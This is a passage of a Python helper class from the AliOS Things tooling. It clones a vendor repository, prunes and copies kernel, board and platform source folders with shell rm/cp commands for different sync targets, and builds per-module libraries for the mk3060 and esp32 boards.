with open(f'..\\data\\cpu\\functions\\opcode_switch\\opcode_8xx1\\opcode_8xx1_{x}-{i}.mcfunction', 'w') as f:
f.write(f'scoreboard players operation Global bitwise_2 = Global V{hex(i)[2:].upper()}\n'
f'scoreboard players operation Global bitwise_2 /= c16 Constant\n'
f'function cpu:bitwise_ops/or\n'
f'scoreboard players operation Global copy_1 = Global result\n'
f'scoreboard players operation Global copy_1 *= c16 Constant\n'
f'scoreboard players operation Global bitwise_1 = Global V{hex(x)[2:].upper()}\n'
f'scoreboard players operation Global bitwise_1 %= c16 Constant\n'
f'scoreboard players operation Global bitwise_2 = Global V{hex(i)[2:].upper()}\n'
f'scoreboard players operation Global bitwise_2 %= c16 Constant\n'
f'function cpu:bitwise_ops/or\n'
f'scoreboard players operation Global copy_1 += Global result\n'
f'scoreboard players operation Global V{hex(x)[2:].upper()} = Global copy_1\n')
for x in range(16):
with open('..\\data\\cpu\\functions\\opcode_switch\\opcode_8xx1.mcfunction', 'a') as f:
f.write(f'execute if score Global PC_nibble_2 matches {x} run function cpu:opcode_switch/opcode_8xx1/opcode_8xx1_{x}\n')
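# Hedged Python equivalent (illustrative, not part of the generator) of what
# each generated mcfunction chain computes for opcode 8xy1, i.e. Vx |= Vy done
# one 4-bit nibble at a time via the scoreboard OR routine.
def or_8xy1_sketch(vx, vy):
    hi = (vx // 16) | (vy // 16)   # bitwise_1/2 /= c16, then bitwise_ops/or
    lo = (vx % 16) | (vy % 16)     # bitwise_1/2 %= c16, then bitwise_ops/or
    return hi * 16 + lo            # copy_1 *= c16; copy_1 += result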
| 68.178571
| 136
| 0.633316
| 278
| 1,909
| 4.219424
| 0.165468
| 0.112532
| 0.184143
| 0.276215
| 0.965047
| 0.947997
| 0.925831
| 0.872123
| 0.867008
| 0.807332
| 0
| 0.039392
| 0.242012
| 1,909
| 27
| 137
| 70.703704
| 0.771251
| 0
| 0
| 0.291667
| 0
| 0.083333
| 0.695652
| 0.22944
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
be4ecf8aeb213dcb5fd4e00067855b172ff4a5a4
| 4,666
|
py
|
Python
|
infoblox_netmri/api/broker/v3_8_0/global_proxy_settings_broker.py
|
infobloxopen/infoblox_netmri
|
aa1c744df7e439dbe163bb9edd165e4e85a9771b
|
[
"Apache-2.0"
] | 12
|
2016-02-19T12:37:54.000Z
|
2022-03-04T20:11:08.000Z
|
infoblox_netmri/api/broker/v3_8_0/global_proxy_settings_broker.py
|
infobloxopen/infoblox_netmri
|
aa1c744df7e439dbe163bb9edd165e4e85a9771b
|
[
"Apache-2.0"
] | 18
|
2015-11-12T18:37:00.000Z
|
2021-05-19T07:59:55.000Z
|
infoblox_netmri/api/broker/v3_8_0/global_proxy_settings_broker.py
|
infobloxopen/infoblox_netmri
|
aa1c744df7e439dbe163bb9edd165e4e85a9771b
|
[
"Apache-2.0"
] | 18
|
2016-01-07T12:04:34.000Z
|
2022-03-31T11:05:41.000Z
|
from ..broker import Broker
class GlobalProxySettingsBroker(Broker):
controller = "global_proxy_settings"
def index(self, **kwargs):
"""Returns Global Proxy Settings.
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("index"), kwargs)
def decoded_index(self, **kwargs):
"""Returns Global Proxy Settings with password decoded.
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("decoded_index"), kwargs)
def collector_proxy(self, **kwargs):
"""Returns Collector Proxy Settings,
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param UnitID: ID of the collector to send the request to, OC only.
:type UnitID: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("collector_proxy"), kwargs)
def update_collector(self, **kwargs):
"""Updates proxy settings on collector.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param UnitID: ID of the collector to send the request to, OC only.
:type UnitID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param username: Username.
:type username: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param password: Password.
:type password: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param proxy_port: Proxy port to set for Global Proxy Settings.
:type proxy_port: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param proxy_address: Proxy address to set for Global Proxy Settings.
:type proxy_address: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param use_global_proxy: Flag which identifies usage of global proxy settings.
:type use_global_proxy: Boolean
**Outputs**
"""
return self.api_request(self._get_method_fullname("update_collector"), kwargs)
def update(self, **kwargs):
"""Updates Global Proxy Settings.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param username: Username.
:type username: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param password: Password.
:type password: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param proxy_port: Proxy port to set for Global Proxy Settings.
:type proxy_port: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param proxy_address: Proxy address to set for Global Proxy Settings.
:type proxy_address: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param use_global_proxy: Flag which identifies usage of global proxy settings.
:type use_global_proxy: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param UnitID: ID of the collector to send the request to, OC only.
:type UnitID: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("update"), kwargs)
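# Hedged usage sketch; how the underlying API client is constructed is an
# assumption and omitted here, only the broker methods above come from this file.
# broker = GlobalProxySettingsBroker(api_client)
# broker.update(proxy_address='proxy.example.com', proxy_port=3128,
#               use_global_proxy=True)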
| 28.278788
| 91
| 0.501715
| 443
| 4,666
| 5.185102
| 0.13544
| 0.113191
| 0.073574
| 0.096212
| 0.859382
| 0.859382
| 0.859382
| 0.823683
| 0.823683
| 0.823683
| 0
| 0
| 0.382983
| 4,666
| 164
| 92
| 28.45122
| 0.797846
| 0.589799
| 0
| 0
| 0
| 0
| 0.099738
| 0.027559
| 0
| 0
| 0
| 0
| 0
| 1
| 0.384615
| false
| 0
| 0.076923
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
fe25eceeae71498e83926f83c2b63c4eb7a24b71
| 62
|
py
|
Python
|
testprint.py
|
KodchakornL/GUI-for-take-notes
|
f6dfbaa352e1e0a1c83055dfa6b860a5ab4bac12
|
[
"MIT"
] | null | null | null |
testprint.py
|
KodchakornL/GUI-for-take-notes
|
f6dfbaa352e1e0a1c83055dfa6b860a5ab4bac12
|
[
"MIT"
] | null | null | null |
testprint.py
|
KodchakornL/GUI-for-take-notes
|
f6dfbaa352e1e0a1c83055dfa6b860a5ab4bac12
|
[
"MIT"
] | null | null | null |
import sys
print(sys.version)
import sys
print(sys.version)
| 15.5
| 19
| 0.774194
| 10
| 62
| 4.8
| 0.4
| 0.375
| 0.583333
| 0.708333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 62
| 4
| 20
| 15.5
| 0.888889
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 10
|
fe2bae18860703f53e7c8e01af913a623b940ac1
| 29,617
|
py
|
Python
|
tools/codesync/vendorslib.py
|
ghsecuritylab/Alios_SDK
|
edd416e7d2961db42c2100ac2d6237ee527d1aee
|
[
"Apache-2.0"
] | 2
|
2021-05-28T08:25:33.000Z
|
2021-11-17T02:58:50.000Z
|
tools/codesync/vendorslib.py
|
ghsecuritylab/Alios_SDK
|
edd416e7d2961db42c2100ac2d6237ee527d1aee
|
[
"Apache-2.0"
] | null | null | null |
tools/codesync/vendorslib.py
|
ghsecuritylab/Alios_SDK
|
edd416e7d2961db42c2100ac2d6237ee527d1aee
|
[
"Apache-2.0"
] | 5
|
2018-05-23T02:56:10.000Z
|
2021-01-02T16:44:09.000Z
|
import sys
import traceback
import errno
import os
import modules
#########################################
# add supported chip vendors branch here
#########################################
class vendorslib:
def __init__(self, configs):
self.srcbase = configs.srcbase
self.base = configs.dstbase
self.srcdir = "./aos"
self.configs = configs
def get_vendor_repo(self):
self.git_cmd = "git clone " + self.configs.dstlink + " aos_vendor_base"
self.dstdir = "./aos_vendor_base"
return 0
def cleanup_code(self):
win = ""
mac = ""
if self.configs.synctype == "nano":
src = self.srcdir + "/alinkconfig.db"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/bootloader"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/device"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/example/nano"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/example/*"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.srcdir + "/example"
linux = "cp -rf " + "./nano " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/script"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/tags"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/doc"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/framework"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/security"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/test"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
# kernel folder
src = self.srcdir + "/kernel/rhino"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel/vcall"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel/vfs"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel/yloop"
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel/*"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel"
linux = "cp -rf ./rhino " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel"
linux = "cp -rf ./vcall " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel"
linux = "cp -rf ./vfs " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/kernel"
linux = "cp -rf ./yloop " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/board/linuxhost"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/board/*"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/board"
if os.path.exists("./linuxhost"):
linux = "cp -rf ./linuxhost " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu/linux"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu/include"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu/*"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu"
if os.path.exists("./linux"):
linux = "cp -rf ./linux " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/platform/mcu/"
if os.path.exists("./include"):
linux = "cp -rf ./include " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/build"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/build"
linux = "rm -rf " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir
if os.path.exists("./build"):
linux = "cp -rf ./build " + src
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/*"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir
src = self.srcdir + "/*"
linux = "cp -rf " + src + " " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
elif self.base == "mxchip" or self.base == "github" or self.base == "esp":
dst = self.dstdir + "/*"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/.gitignore"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/.vscode"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/*"
dst = self.dstdir
linux = "cp -rf " + src + " " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
else:
##############################################################
# keep platform and board folder the same as different targets
##############################################################
src = self.dstdir + "/platform"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/linux " + "./platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/beken " + "./platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.dstdir + "/board"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.dstdir + "/example"
if os.path.exists(src):
linux = "cp -rf " + src + " ./"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/*"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/.gitignore"
if os.path.exists(dst):
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
src = self.srcdir + "/*"
dst = self.dstdir
linux = "cp -rf " + src + " " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/platform"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/board"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
dst = self.dstdir + "/example"
linux = "rm -rf " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
if os.path.exists("./platform"):
linux = "cp -rf " + "./platform "+ self.dstdir
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + "./platform/mcu/linux " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + "./platform/mcu/beken " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
else:
linux = "mkdir " + self.dstdir + "/platform"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/arch " + self.dstdir + "/platform/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "mkdir " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/linux " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/beken " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/platform/mcu/include " + self.dstdir + "/platform/mcu"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
if os.path.exists("./board"):
linux = "cp -rf " + "./board "+ self.dstdir
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/board/linuxhost "+ self.dstdir + "/board/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/board/mk3060 "+ self.dstdir + "/board/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
else:
linux = "mkdir " + self.dstdir + "/board"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/board/linuxhost "+ self.dstdir + "/board/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
linux = "cp -rf " + self.srcdir + "/board/mk3060 "+ self.dstdir + "/board/"
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
if os.path.exists("./example"):
linux = "cp -rf " + "./example "+ self.dstdir
else:
linux = "cp -rf " + self.srcdir + "/example "+ self.dstdir
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
modules.popen(cmd, shell=True, cwd=os.getcwd())
def make_folder(self, module):
dst = ""
# default build mk3060
if module == "mesh":
if self.base == "esp":
dst = self.dstdir + "/kernel/protocols/mesh/lib/esp32"
else:
dst = self.dstdir + "/kernel/protocols/mesh/lib/mk3060"
elif module == "ywss":
if self.base == "esp":
dst = self.dstdir + "/framework/ywss/lib/esp32"
else:
dst = self.dstdir + "/framework/ywss/lib/mk3060"
elif module == "rhino":
dst = self.dstdir + "/kernel/rhino/lib/mk3060"
elif module == "wsf":
dst = self.dstdir + "/framework/connectivity/wsf/lib/mk3060"
elif module == "msdp":
if self.srcbase == "1.0.1":
base_dstdir = self.dstdir + "/framework/protocol/alink/msdp/"
else:
base_dstdir = self.dstdir + "/framework/gateway/msdp/"
dst = base_dstdir + "lib/mk3060"
elif module == "devmgr":
if self.srcbase == "1.0.1":
base_dstdir = self.dstdir + "/framework/protocol/alink/devmgr/"
else:
base_dstdir = self.dstdir + "/framework/gateway/devmgr/"
dst = base_dstdir + "lib/mk3060"
elif module == "gateway":
dst = self.dstdir + "/framework/gateway/lib/mk3060"
else:
return 0
linux = "mkdir " + dst
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
return 1
modules.popen(cmd, shell=True, cwd=os.getcwd())
# add corresponding platform's folder here
return 0
def make_lib(self, module):
linux = ""
mac = ""
win = ""
if module == "mesh":
linux = "aos makelib -r ARM968E-S kernel/protocols/mesh"
elif module == "ywss":
linux = "aos makelib -r ARM968E-S framework/ywss"
elif module == "rhino":
linux = "aos makelib -r ARM968E-S kernel/rhino"
elif module == "wsf":
linux = "aos makelib -r ARM968E-S framework/connectivity/wsf"
elif module == "msdp":
linux = "aos makelib -r ARM968E-S framework/gateway/msdp"
elif module == "devmgr":
linux = "aos makelib -r ARM968E-S framework/gateway/devmgr"
elif module == "gateway":
linux = "aos makelib -r ARM968E-S framework/gateway"
else:
return 0
cmd = mac if sys.platform == 'darwin' else (linux if sys.platform == 'linux2' else (win if sys.platform == 'win32' else None))
if not cmd:
error('Unknown system!')
return 1
modules.popen(cmd, shell=True, cwd=os.getcwd())
return 0
def copy_lib(self, module):
linux = ""
mac = ""
win = ""
if module == "mesh":
src = self.srcdir + "/mesh.ARM968E-S.mk3060.GCC.release.a"
dst = self.dstdir + "/kernel/protocols/mesh/lib/mk3060/libmesh.a"
elif module == "ywss":
